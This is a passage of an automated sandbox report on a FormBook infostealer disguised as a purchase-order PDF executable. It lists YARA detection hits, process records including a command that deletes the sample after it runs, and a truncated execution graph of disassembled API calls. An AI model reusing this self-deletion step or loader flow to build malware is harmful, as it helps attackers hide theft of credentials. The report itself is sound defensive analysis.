                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:6
                                          Start time:13:41:35
                                          Start date:22/08/2023
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del "C:\Users\user\Desktop\PO-230821_pdf.exe"
                                          Imagebase:0x770000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:13:41:36
                                          Start date:22/08/2023
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff69d510000
                                          File size:843'264 bytes
                                          MD5 hash:CE1A079265E7A92863BAAD92DE538D72
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:14.1%
                                            Dynamic/Decrypted Code Coverage:7.1%
                                            Signature Coverage:11.3%
                                            Total number of Nodes:1446
                                            Total number of Limit Nodes:37
                                            execution_graph 7017 403640 SetErrorMode GetVersionExW 7018 403692 GetVersionExW 7017->7018 7019 4036ca 7017->7019 7018->7019 7020 403723 7019->7020 7021 406a35 5 API calls 7019->7021 7108 4069c5 GetSystemDirectoryW 7020->7108 7021->7020 7023 403739 lstrlenA 7023->7020 7024 403749 7023->7024 7111 406a35 GetModuleHandleA 7024->7111 7027 406a35 5 API calls 7028 403757 7027->7028 7029 406a35 5 API calls 7028->7029 7030 403763 #17 OleInitialize SHGetFileInfoW 7029->7030 7117 406668 lstrcpynW 7030->7117 7033 4037b0 GetCommandLineW 7118 406668 lstrcpynW 7033->7118 7035 4037c2 7119 405f64 7035->7119 7038 4038f7 7039 40390b GetTempPathW 7038->7039 7123 40360f 7039->7123 7041 403923 7043 403927 GetWindowsDirectoryW lstrcatW 7041->7043 7044 40397d DeleteFileW 7041->7044 7042 405f64 CharNextW 7046 4037f9 7042->7046 7047 40360f 12 API calls 7043->7047 7133 4030d0 GetTickCount GetModuleFileNameW 7044->7133 7046->7038 7046->7042 7050 4038f9 7046->7050 7049 403943 7047->7049 7048 403990 7056 405f64 CharNextW 7048->7056 7082 403a54 7048->7082 7093 403a45 7048->7093 7049->7044 7051 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 7049->7051 7219 406668 lstrcpynW 7050->7219 7052 40360f 12 API calls 7051->7052 7055 403975 7052->7055 7055->7044 7055->7082 7059 4039b2 7056->7059 7069 403a1b 7059->7069 7070 403a5c 7059->7070 7060 403b91 7062 403b99 GetCurrentProcess OpenProcessToken 7060->7062 7063 403c0f ExitProcess 7060->7063 7061 403b7c 7282 405cc8 7061->7282 7066 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 7062->7066 7067 403bdf 7062->7067 7066->7067 7072 406a35 5 API calls 7067->7072 7220 40603f 7069->7220 7236 405c33 7070->7236 7075 403be6 7072->7075 7077 403bfb ExitWindowsEx 7075->7077 7081 403c08 7075->7081 7077->7063 7077->7081 7078 403a72 lstrcatW 7079 403a7d lstrcatW lstrcmpiW 7078->7079 7079->7082 7083 403a9d 7079->7083 7286 40140b 7081->7286 7273 403c25 7082->7273 7084 403aa2 7083->7084 7085 403aa9 7083->7085 7239 405b99 CreateDirectoryW 7084->7239 7244 405c16 CreateDirectoryW 7085->7244 7086 403a3a 7235 406668 lstrcpynW 7086->7235 7092 403aae SetCurrentDirectoryW 7094 403ac0 7092->7094 7095 403acb 7092->7095 7163 403d17 7093->7163 7247 406668 lstrcpynW 7094->7247 7248 406668 lstrcpynW 7095->7248 7100 403b19 CopyFileW 7105 403ad8 7100->7105 7101 403b63 7103 406428 36 API calls 7101->7103 7103->7082 7104 4066a5 17 API calls 7104->7105 7105->7101 7105->7104 7107 403b4d CloseHandle 7105->7107 7249 4066a5 7105->7249 7266 406428 MoveFileExW 7105->7266 7270 405c4b CreateProcessW 7105->7270 7107->7105 7110 4069e7 wsprintfW LoadLibraryExW 7108->7110 7110->7023 7112 406a51 7111->7112 7113 406a5b GetProcAddress 7111->7113 7115 4069c5 3 API calls 7112->7115 7114 403750 7113->7114 7114->7027 7116 406a57 7115->7116 7116->7113 7116->7114 7117->7033 7118->7035 7120 405f6a 7119->7120 7121 4037e8 CharNextW 7120->7121 7122 405f71 CharNextW 7120->7122 7121->7046 7122->7120 7289 4068ef 7123->7289 7125 403625 7125->7041 7126 40361b 7126->7125 7298 405f37 lstrlenW CharPrevW 7126->7298 7129 405c16 2 API calls 7130 403633 7129->7130 7301 406187 7130->7301 7305 406158 GetFileAttributesW CreateFileW 7133->7305 7135 403113 7162 403120 7135->7162 7306 406668 lstrcpynW 7135->7306 7137 403136 7307 405f83 lstrlenW 7137->7307 7141 403147 GetFileSize 7142 403241 7141->7142 7161 40315e 7141->7161 7312 40302e 7142->7312 7146 403286 GlobalAlloc 7147 40329d 7146->7147 7152 406187 2 API calls 7147->7152 7149 4032de 7150 40302e 32 API calls 7149->7150 7150->7162 7151 403267 7153 4035e2 ReadFile 7151->7153 7154 4032ae CreateFileW 7152->7154 7156 403272 7153->7156 7157 4032e8 7154->7157 7154->7162 7155 40302e 32 API calls 7155->7161 7156->7146 7156->7162 7327 4035f8 SetFilePointer 7157->7327 7159 4032f6 7328 403371 7159->7328 7161->7142 7161->7149 7161->7155 7161->7162 7343 4035e2 7161->7343 7162->7048 7164 406a35 5 API calls 7163->7164 7165 403d2b 7164->7165 7166 403d31 7165->7166 7167 403d43 7165->7167 7398 4065af wsprintfW 7166->7398 7399 406536 7167->7399 7170 403d92 lstrcatW 7173 403d41 7170->7173 7172 406536 3 API calls 7172->7170 7390 403fed 7173->7390 7176 40603f 18 API calls 7177 403dc4 7176->7177 7178 403e58 7177->7178 7180 406536 3 API calls 7177->7180 7179 40603f 18 API calls 7178->7179 7181 403e5e 7179->7181 7183 403df6 7180->7183 7182 403e6e LoadImageW 7181->7182 7184 4066a5 17 API calls 7181->7184 7185 403f14 7182->7185 7186 403e95 RegisterClassW 7182->7186 7183->7178 7187 403e17 lstrlenW 7183->7187 7190 405f64 CharNextW 7183->7190 7184->7182 7189 40140b 2 API calls 7185->7189 7188 403ecb SystemParametersInfoW CreateWindowExW 7186->7188 7218 403f1e 7186->7218 7191 403e25 lstrcmpiW 7187->7191 7192 403e4b 7187->7192 7188->7185 7193 403f1a 7189->7193 7194 403e14 7190->7194 7191->7192 7195 403e35 GetFileAttributesW 7191->7195 7196 405f37 3 API calls 7192->7196 7198 403fed 18 API calls 7193->7198 7193->7218 7194->7187 7197 403e41 7195->7197 7199 403e51 7196->7199 7197->7192 7200 405f83 2 API calls 7197->7200 7201 403f2b 7198->7201 7404 406668 lstrcpynW 7199->7404 7200->7192 7203 403f37 ShowWindow 7201->7203 7204 403fba 7201->7204 7206 4069c5 3 API calls 7203->7206 7405 40579d OleInitialize 7204->7405 7208 403f4f 7206->7208 7207 403fc0 7209 403fc4 7207->7209 7210 403fdc 7207->7210 7211 403f5d GetClassInfoW 7208->7211 7213 4069c5 3 API calls 7208->7213 7217 40140b 2 API calls 7209->7217 7209->7218 7212 40140b 2 API calls 7210->7212 7214 403f71 GetClassInfoW RegisterClassW 7211->7214 7215 403f87 DialogBoxParamW 7211->7215 7212->7218 7213->7211 7214->7215 7216 40140b 2 API calls 7215->7216 7216->7218 7217->7218 7218->7082 7219->7039 7427 406668 lstrcpynW 7220->7427 7222 406050 7428 405fe2 CharNextW CharNextW 7222->7428 7225 403a27 7225->7082 7234 406668 lstrcpynW 7225->7234 7226 4068ef 5 API calls 7232 406066 7226->7232 7227 406097 lstrlenW 7228 4060a2 7227->7228 7227->7232 7230 405f37 3 API calls 7228->7230 7231 4060a7 GetFileAttributesW 7230->7231 7231->7225 7232->7225 7232->7227 7233 405f83 2 API calls 7232->7233 7434 40699e FindFirstFileW 7232->7434 7233->7227 7234->7086 7235->7093 7237 406a35 5 API calls 7236->7237 7238 403a61 lstrcatW 7237->7238 7238->7078 7238->7079 7240 403aa7 7239->7240 7241 405bea GetLastError 7239->7241 7240->7092 7241->7240 7242 405bf9 SetFileSecurityW 7241->7242 7242->7240 7243 405c0f GetLastError 7242->7243 7243->7240 7245 405c26 7244->7245 7246 405c2a GetLastError 7244->7246 7245->7092 7246->7245 7247->7095 7248->7105 7253 4066b2 7249->7253 7250 4068d5 7251 403b0d DeleteFileW 7250->7251 7439 406668 lstrcpynW 7250->7439 7251->7100 7251->7105 7253->7250 7254 4068a3 lstrlenW 7253->7254 7255 4067ba GetSystemDirectoryW 7253->7255 7258 406536 3 API calls 7253->7258 7259 4066a5 10 API calls 7253->7259 7260 4067cd GetWindowsDirectoryW 7253->7260 7261 4068ef 5 API calls 7253->7261 7262 4067fc SHGetSpecialFolderLocation 7253->7262 7263 406844 lstrcatW 7253->7263 7264 4066a5 10 API calls 7253->7264 7437 4065af wsprintfW 7253->7437 7438 406668 lstrcpynW 7253->7438 7254->7253 7255->7253 7258->7253 7259->7254 7260->7253 7261->7253 7262->7253 7265 406814 SHGetPathFromIDListW CoTaskMemFree 7262->7265 7263->7253 7264->7253 7265->7253 7267 406449 7266->7267 7268 40643c 7266->7268 7267->7105 7440 4062ae 7268->7440 7271 405c8a 7270->7271 7272 405c7e CloseHandle 7270->7272 7271->7105 7272->7271 7274 403c40 7273->7274 7275 403c36 CloseHandle 7273->7275 7276 403c54 7274->7276 7277 403c4a CloseHandle 7274->7277 7275->7274 7474 403c82 7276->7474 7277->7276 7283 405cdd 7282->7283 7284 403b89 ExitProcess 7283->7284 7285 405cf1 MessageBoxIndirectW 7283->7285 7285->7284 7287 401389 2 API calls 7286->7287 7288 401420 7287->7288 7288->7063 7290 4068fc 7289->7290 7292 406965 CharNextW 7290->7292 7293 405f64 CharNextW 7290->7293 7294 406972 7290->7294 7296 406951 CharNextW 7290->7296 7297 406960 CharNextW 7290->7297 7291 406977 CharPrevW 7291->7294 7292->7290 7292->7294 7293->7290 7294->7291 7295 406998 7294->7295 7295->7126 7296->7290 7297->7292 7299 405f53 lstrcatW 7298->7299 7300 40362d 7298->7300 7299->7300 7300->7129 7302 406194 GetTickCount GetTempFileNameW 7301->7302 7303 40363e 7302->7303 7304 4061ca 7302->7304 7303->7041 7304->7302 7304->7303 7305->7135 7306->7137 7308 405f91 7307->7308 7309 40313c 7308->7309 7310 405f97 CharPrevW 7308->7310 7311 406668 lstrcpynW 7309->7311 7310->7308 7310->7309 7311->7141 7313 403057 7312->7313 7314 40303f 7312->7314 7316 403067 GetTickCount 7313->7316 7317 40305f 7313->7317 7315 403048 DestroyWindow 7314->7315 7320 40304f 7314->7320 7315->7320 7319 403075 7316->7319 7316->7320 7347 406a71 7317->7347 7321 4030aa CreateDialogParamW ShowWindow 7319->7321 7322 40307d 7319->7322 7320->7146 7320->7162 7346 4035f8 SetFilePointer 7320->7346 7321->7320 7322->7320 7351 403012 7322->7351 7324 40308b wsprintfW 7354 4056ca 7324->7354 7327->7159 7329 403380 SetFilePointer 7328->7329 7330 40339c 7328->7330 7329->7330 7365 403479 GetTickCount 7330->7365 7333 403439 7333->7162 7336 403479 42 API calls 7337 4033d3 7336->7337 7337->7333 7338 40343f ReadFile 7337->7338 7340 4033e2 7337->7340 7338->7333 7340->7333 7341 4061db ReadFile 7340->7341 7380 40620a WriteFile 7340->7380 7341->7340 7344 4061db ReadFile 7343->7344 7345 4035f5 7344->7345 7345->7161 7346->7151 7348 406a8e PeekMessageW 7347->7348 7349 406a84 DispatchMessageW 7348->7349 7350 406a9e 7348->7350 7349->7348 7350->7320 7352 403021 7351->7352 7353 403023 MulDiv 7351->7353 7352->7353 7353->7324 7355 4056e5 7354->7355 7364 4030a8 7354->7364 7356 405701 lstrlenW 7355->7356 7357 4066a5 17 API calls 7355->7357 7358 40572a 7356->7358 7359 40570f lstrlenW 7356->7359 7357->7356 7361 405730 SetWindowTextW 7358->7361 7362 40573d 7358->7362 7360 405721 lstrcatW 7359->7360 7359->7364 7360->7358 7361->7362 7363 405743 SendMessageW SendMessageW SendMessageW 7362->7363 7362->7364 7363->7364 7364->7320 7366 4035d1 7365->7366 7367 4034a7 7365->7367 7368 40302e 32 API calls 7366->7368 7382 4035f8 SetFilePointer 7367->7382 7375 4033a3 7368->7375 7370 4034b2 SetFilePointer 7372 4034d7 7370->7372 7371 4035e2 ReadFile 7371->7372 7372->7371 7374 40302e 32 API calls 7372->7374 7372->7375 7376 40620a WriteFile 7372->7376 7377 4035b2 SetFilePointer 7372->7377 7383 406bb0 7372->7383 7374->7372 7375->7333 7378 4061db ReadFile 7375->7378 7376->7372 7377->7366 7379 4033bc 7378->7379 7379->7333 7379->7336 7381 406228 7380->7381 7381->7340 7382->7370 7384 406bd5 7383->7384 7385 406bdd 7383->7385 7384->7372 7385->7384 7386 406c64 GlobalFree 7385->7386 7387 406c6d GlobalAlloc 7385->7387 7388 406ce4 GlobalAlloc 7385->7388 7389 406cdb GlobalFree 7385->7389 7386->7387 7387->7384 7387->7385 7388->7384 7388->7385 7389->7388 7391 404001 7390->7391 7412 4065af wsprintfW 7391->7412 7393 404072 7413 4040a6 7393->7413 7395 403da2 7395->7176 7396 404077 7396->7395 7397 4066a5 17 API calls 7396->7397 7397->7396 7398->7173 7416 4064d5 7399->7416 7402 403d73 7402->7170 7402->7172 7403 40656a RegQueryValueExW RegCloseKey 7403->7402 7404->7178 7420 404610 7405->7420 7407 4057c0 7411 4057e7 7407->7411 7423 401389 7407->7423 7408 404610 SendMessageW 7409 4057f9 OleUninitialize 7408->7409 7409->7207 7411->7408 7412->7393 7414 4066a5 17 API calls 7413->7414 7415 4040b4 SetWindowTextW 7414->7415 7415->7396 7417 4064e4 7416->7417 7418 4064ed RegOpenKeyExW 7417->7418 7419 4064e8 7417->7419 7418->7419 7419->7402 7419->7403 7421 404628 7420->7421 7422 404619 SendMessageW 7420->7422 7421->7407 7422->7421 7424 401390 7423->7424 7425 4013fe 7424->7425 7426 4013cb MulDiv SendMessageW 7424->7426 7425->7407 7426->7424 7427->7222 7429 405fff 7428->7429 7432 406011 7428->7432 7431 40600c CharNextW 7429->7431 7429->7432 7430 406035 7430->7225 7430->7226 7431->7430 7432->7430 7433 405f64 CharNextW 7432->7433 7433->7432 7435 4069b4 FindClose 7434->7435 7436 4069bf 7434->7436 7435->7436 7436->7232 7437->7253 7438->7253 7439->7251 7441 406304 GetShortPathNameW 7440->7441 7442 4062de 7440->7442 7443 406423 7441->7443 7444 406319 7441->7444 7467 406158 GetFileAttributesW CreateFileW 7442->7467 7443->7267 7444->7443 7446 406321 wsprintfA 7444->7446 7449 4066a5 17 API calls 7446->7449 7447 4062e8 CloseHandle GetShortPathNameW 7447->7443 7448 4062fc 7447->7448 7448->7441 7448->7443 7450 406349 7449->7450 7468 406158 GetFileAttributesW CreateFileW 7450->7468 7452 406356 7452->7443 7453 406365 GetFileSize GlobalAlloc 7452->7453 7454 406387 7453->7454 7455 40641c CloseHandle 7453->7455 7456 4061db ReadFile 7454->7456 7455->7443 7457 40638f 7456->7457 7457->7455 7469 4060bd lstrlenA 7457->7469 7460 4063a6 lstrcpyA 7463 4063c8 7460->7463 7461 4063ba 7462 4060bd 4 API calls 7461->7462 7462->7463 7464 4063ff SetFilePointer 7463->7464 7465 40620a WriteFile 7464->7465 7466 406415 GlobalFree 7465->7466 7466->7455 7467->7447 7468->7452 7470 4060fe lstrlenA 7469->7470 7471 4060d7 lstrcmpiA 7470->7471 7472 406106 7470->7472 7471->7472 7473 4060f5 CharNextA 7471->7473 7472->7460 7472->7461 7473->7470 7475 403c90 7474->7475 7476 403c59 7475->7476 7477 403c95 FreeLibrary GlobalFree 7475->7477 7478 405d74 7476->7478 7477->7476 7477->7477 7479 40603f 18 API calls 7478->7479 7480 405d94 7479->7480 7481 405db3 7480->7481 7482 405d9c DeleteFileW 7480->7482 7484 405ede 7481->7484 7518 406668 lstrcpynW 7481->7518 7483 403b71 OleUninitialize 7482->7483 7483->7060 7483->7061 7484->7483 7489 40699e 2 API calls 7484->7489 7486 405dd9 7487 405dec 7486->7487 7488 405ddf lstrcatW 7486->7488 7491 405f83 2 API calls 7487->7491 7490 405df2 7488->7490 7492 405ef8 7489->7492 7493 405e02 lstrcatW 7490->7493 7494 405df8 7490->7494 7491->7490 7492->7483 7496 405efc 7492->7496 7495 405e0d lstrlenW FindFirstFileW 7493->7495 7494->7493 7494->7495 7497 405ed3 7495->7497 7516 405e2f 7495->7516 7498 405f37 3 API calls 7496->7498 7497->7484 7499 405f02 7498->7499 7501 405d2c 5 API calls 7499->7501 7500 405eb6 FindNextFileW 7504 405ecc FindClose 7500->7504 7500->7516 7503 405f0e 7501->7503 7505 405f12 7503->7505 7506 405f28 7503->7506 7504->7497 7505->7483 7509 4056ca 24 API calls 7505->7509 7508 4056ca 24 API calls 7506->7508 7508->7483 7511 405f1f 7509->7511 7510 405d74 60 API calls 7510->7516 7513 406428 36 API calls 7511->7513 7512 4056ca 24 API calls 7512->7500 7515 405f26 7513->7515 7514 4056ca 24 API calls 7514->7516 7515->7483 7516->7500 7516->7510 7516->7512 7516->7514 7517 406428 36 API calls 7516->7517 7519 406668 lstrcpynW 7516->7519 7520 405d2c 7516->7520 7517->7516 7518->7486 7519->7516 7528 406133 GetFileAttributesW 7520->7528 7523 405d59 7523->7516 7524 405d47 RemoveDirectoryW 7526 405d55 7524->7526 7525 405d4f DeleteFileW 7525->7526 7526->7523 7527 405d65 SetFileAttributesW 7526->7527 7527->7523 7529 405d38 7528->7529 7530 406145 SetFileAttributesW 7528->7530 7529->7523 7529->7524 7529->7525 7530->7529 7538 401941 7539 401943 7538->7539 7544 402da6 7539->7544 7542 405d74 67 API calls 7543 401951 7542->7543 7545 402db2 7544->7545 7546 4066a5 17 API calls 7545->7546 7547 402dd3 7546->7547 7548 401948 7547->7548 7549 4068ef 5 API calls 7547->7549 7548->7542 7549->7548 8727 402b59 8728 402b60 8727->8728 8729 402bab 8727->8729 8731 402d84 17 API calls 8728->8731 8735 402ba9 8728->8735 8730 406a35 5 API calls 8729->8730 8732 402bb2 8730->8732 8734 402b6e 8731->8734 8733 402da6 17 API calls 8732->8733 8736 402bbb 8733->8736 8737 402d84 17 API calls 8734->8737 8736->8735 8738 402bbf IIDFromString 8736->8738 8740 402b7a 8737->8740 8738->8735 8739 402bce 8738->8739 8739->8735 8745 406668 lstrcpynW 8739->8745 8744 4065af wsprintfW 8740->8744 8742 402beb CoTaskMemFree 8742->8735 8744->8735 8745->8742 8746 402a5b 8747 402d84 17 API calls 8746->8747 8748 402a61 8747->8748 8749 402aa4 8748->8749 8750 402a88 8748->8750 8752 40292e 8748->8752 8753 402abe 8749->8753 8754 402aae 8749->8754 8751 402a8d 8750->8751 8759 402a9e 8750->8759 8760 406668 lstrcpynW 8751->8760 8756 4066a5 17 API calls 8753->8756 8755 402d84 17 API calls 8754->8755 8755->8759 8756->8759 8759->8752 8761 4065af wsprintfW 8759->8761 8760->8752 8761->8752 8593 40175c 8594 402da6 17 API calls 8593->8594 8595 401763 8594->8595 8596 406187 2 API calls 8595->8596 8597 40176a 8596->8597 8598 406187 2 API calls 8597->8598 8598->8597 8773 401563 8774 402ba4 8773->8774 8777 4065af wsprintfW 8774->8777 8776 402ba9 8777->8776 8785 401968 8786 402d84 17 API calls 8785->8786 8787 40196f 8786->8787 8788 402d84 17 API calls 8787->8788 8789 40197c 8788->8789 8790 402da6 17 API calls 8789->8790 8791 401993 lstrlenW 8790->8791 8792 4019a4 8791->8792 8795 4019e5 8792->8795 8797 406668 lstrcpynW 8792->8797 8794 4019d5 8794->8795 8796 4019da lstrlenW 8794->8796 8796->8795 8797->8794 8599 40176f 8600 402da6 17 API calls 8599->8600 8601 401776 8600->8601 8602 401796 8601->8602 8603 40179e 8601->8603 8639 406668 lstrcpynW 8602->8639 8640 406668 lstrcpynW 8603->8640 8606 40179c 8610 4068ef 5 API calls 8606->8610 8607 4017a9 8608 405f37 3 API calls 8607->8608 8609 4017af lstrcatW 8608->8609 8609->8606 8618 4017bb 8610->8618 8611 40699e 2 API calls 8611->8618 8612 4017f7 8613 406133 2 API calls 8612->8613 8613->8618 8615 4017cd CompareFileTime 8615->8618 8616 40188d 8617 4056ca 24 API calls 8616->8617 8619 401897 8617->8619 8618->8611 8618->8612 8618->8615 8618->8616 8621 406668 lstrcpynW 8618->8621 8626 4066a5 17 API calls 8618->8626 8633 405cc8 MessageBoxIndirectW 8618->8633 8637 401864 8618->8637 8638 406158 GetFileAttributesW CreateFileW 8618->8638 8622 403371 44 API calls 8619->8622 8620 4056ca 24 API calls 8623 401879 8620->8623 8621->8618 8624 4018aa 8622->8624 8625 4018be SetFileTime 8624->8625 8627 4018d0 FindCloseChangeNotification 8624->8627 8625->8627 8626->8618 8627->8623 8628 4018e1 8627->8628 8629 4018e6 8628->8629 8630 4018f9 8628->8630 8631 4066a5 17 API calls 8629->8631 8632 4066a5 17 API calls 8630->8632 8634 4018ee lstrcatW 8631->8634 8635 401901 8632->8635 8633->8618 8634->8635 8635->8623 8636 405cc8 MessageBoxIndirectW 8635->8636 8636->8623 8637->8620 8637->8623 8638->8618 8639->8606 8640->8607 8952 40190c 8953 401943 8952->8953 8954 402da6 17 API calls 8953->8954 8955 401948 8954->8955 8956 405d74 67 API calls 8955->8956 8957 401951 8956->8957 9049 40261c 9050 402da6 17 API calls 9049->9050 9051 402623 9050->9051 9054 406158 GetFileAttributesW CreateFileW 9051->9054 9053 40262f 9054->9053 9402 40252a 9413 402de6 9402->9413 9405 402da6 17 API calls 9406 40253d 9405->9406 9407 402548 RegQueryValueExW 9406->9407 9408 40292e 9406->9408 9409 40256e RegCloseKey 9407->9409 9410 402568 9407->9410 9409->9408 9410->9409 9418 4065af wsprintfW 9410->9418 9414 402da6 17 API calls 9413->9414 9415 402dfd 9414->9415 9416 4064d5 RegOpenKeyExW 9415->9416 9417 402534 9416->9417 9417->9405 9418->9409 9572 40263e 9573 402652 9572->9573 9574 40266d 9572->9574 9575 402d84 17 API calls 9573->9575 9576 402672 9574->9576 9577 40269d 9574->9577 9587 402659 9575->9587 9578 402da6 17 API calls 9576->9578 9579 402da6 17 API calls 9577->9579 9580 402679 9578->9580 9581 4026a4 lstrlenW 9579->9581 9589 40668a WideCharToMultiByte 9580->9589 9581->9587 9583 40268d lstrlenA 9583->9587 9584 4026e7 9585 4026d1 9585->9584 9586 40620a WriteFile 9585->9586 9586->9584 9587->9584 9587->9585 9590 406239 SetFilePointer 9587->9590 9589->9583 9591 40626d 9590->9591 9592 406255 9590->9592 9591->9585 9593 4061db ReadFile 9592->9593 9594 406261 9593->9594 9594->9591 9595 406276 SetFilePointer 9594->9595 9596 40629e SetFilePointer 9594->9596 9595->9596 9597 406281 9595->9597 9596->9591 9598 40620a WriteFile 9597->9598 9598->9591 7550 4015c1 7551 402da6 17 API calls 7550->7551 7552 4015c8 7551->7552 7553 405fe2 4 API calls 7552->7553 7565 4015d1 7553->7565 7554 401631 7556 401663 7554->7556 7557 401636 7554->7557 7555 405f64 CharNextW 7555->7565 7560 401423 24 API calls 7556->7560 7569 401423 7557->7569 7566 40165b 7560->7566 7562 405c16 2 API calls 7562->7565 7563 405c33 5 API calls 7563->7565 7564 40164a SetCurrentDirectoryW 7564->7566 7565->7554 7565->7555 7565->7562 7565->7563 7567 401617 GetFileAttributesW 7565->7567 7568 405b99 4 API calls 7565->7568 7567->7565 7568->7565 7570 4056ca 24 API calls 7569->7570 7571 401431 7570->7571 7572 406668 lstrcpynW 7571->7572 7572->7564 9680 4016cc 9681 402da6 17 API calls 9680->9681 9682 4016d2 GetFullPathNameW 9681->9682 9685 4016ec 9682->9685 9689 40170e 9682->9689 9683 401723 GetShortPathNameW 9684 402c2a 9683->9684 9686 40699e 2 API calls 9685->9686 9685->9689 9687 4016fe 9686->9687 9687->9689 9690 406668 lstrcpynW 9687->9690 9689->9683 9689->9684 9690->9689 7702 4020d8 7703 40219c 7702->7703 7704 4020ea 7702->7704 7706 401423 24 API calls 7703->7706 7705 402da6 17 API calls 7704->7705 7707 4020f1 7705->7707 7713 4022f6 7706->7713 7708 402da6 17 API calls 7707->7708 7709 4020fa 7708->7709 7710 402110 LoadLibraryExW 7709->7710 7711 402102 GetModuleHandleW 7709->7711 7710->7703 7712 402121 7710->7712 7711->7710 7711->7712 7724 406aa4 7712->7724 7716 402132 7718 402151 GetModuleHandleExW 7716->7718 7719 40213a 7716->7719 7717 40216b 7720 4056ca 24 API calls 7717->7720 7722 402142 7718->7722 7721 401423 24 API calls 7719->7721 7720->7722 7721->7722 7722->7713 7723 40218e FreeLibrary 7722->7723 7723->7713 7729 40668a WideCharToMultiByte 7724->7729 7726 406ac1 7727 406ac8 GetProcAddress 7726->7727 7728 40212c 7726->7728 7727->7728 7728->7716 7728->7717 7729->7726 7531 100010b0 10 API calls 7536 10001000 GetModuleHandleW GetProcAddress 7531->7536 7535 100011b0 7537 10001035 VirtualAlloc 7536->7537 7537->7535 9755 401ff6 9756 402da6 17 API calls 9755->9756 9757 401ffd 9756->9757 9758 40699e 2 API calls 9757->9758 9759 402003 9758->9759 9761 402014 9759->9761 9762 4065af wsprintfW 9759->9762 9762->9761 7730 100014b8 7731 100014c1 7730->7731 7732 100014c6 7730->7732 7744 10002549 7731->7744 7736 100014db 7732->7736 7735 100014d4 7737 100014e7 ___lock_fhandle 7736->7737 7741 10001535 ___DllMainCRTStartup 7737->7741 7743 10001592 ___lock_fhandle 7737->7743 7748 1000134c 7737->7748 7739 1000156f 7740 1000134c __CRT_INIT@12 129 API calls 7739->7740 7739->7743 7740->7743 7741->7739 7742 1000134c __CRT_INIT@12 129 API calls 7741->7742 7741->7743 7742->7739 7743->7735 7745 10002579 GetSystemTimeAsFileTime GetCurrentThreadId GetTickCount64 QueryPerformanceCounter 7744->7745 7746 1000256c 7744->7746 7747 10002570 7745->7747 7746->7745 7746->7747 7747->7732 7749 10001358 ___lock_fhandle 7748->7749 7750 10001360 7749->7750 7751 100013d4 7749->7751 7796 10001e8c GetProcessHeap 7750->7796 7752 100013d8 7751->7752 7753 1000143d 7751->7753 7758 100013f9 7752->7758 7765 10001369 ___lock_fhandle __CRT_INIT@12 7752->7765 7878 10001c25 7752->7878 7755 100014a0 7753->7755 7756 10001442 7753->7756 7755->7765 7937 100018be 7755->7937 7911 1000268a FlsGetValue 7756->7911 7757 10001365 7757->7765 7797 10001a27 7757->7797 7881 10001b02 DecodePointer 7758->7881 7762 1000144d 7762->7765 7912 10002720 7762->7912 7765->7741 7767 10001375 __RTC_Initialize 7767->7765 7773 10001385 GetCommandLineA 7767->7773 7769 1000140f __CRT_INIT@12 7907 10001428 7769->7907 7772 100021b1 __ioterm 71 API calls 7774 1000140a 7772->7774 7818 100025e3 GetEnvironmentStringsW 7773->7818 7777 10001a9d __mtterm 73 API calls 7774->7777 7777->7769 7778 10001395 __ioinit0 7847 10002203 7778->7847 7779 10001476 7780 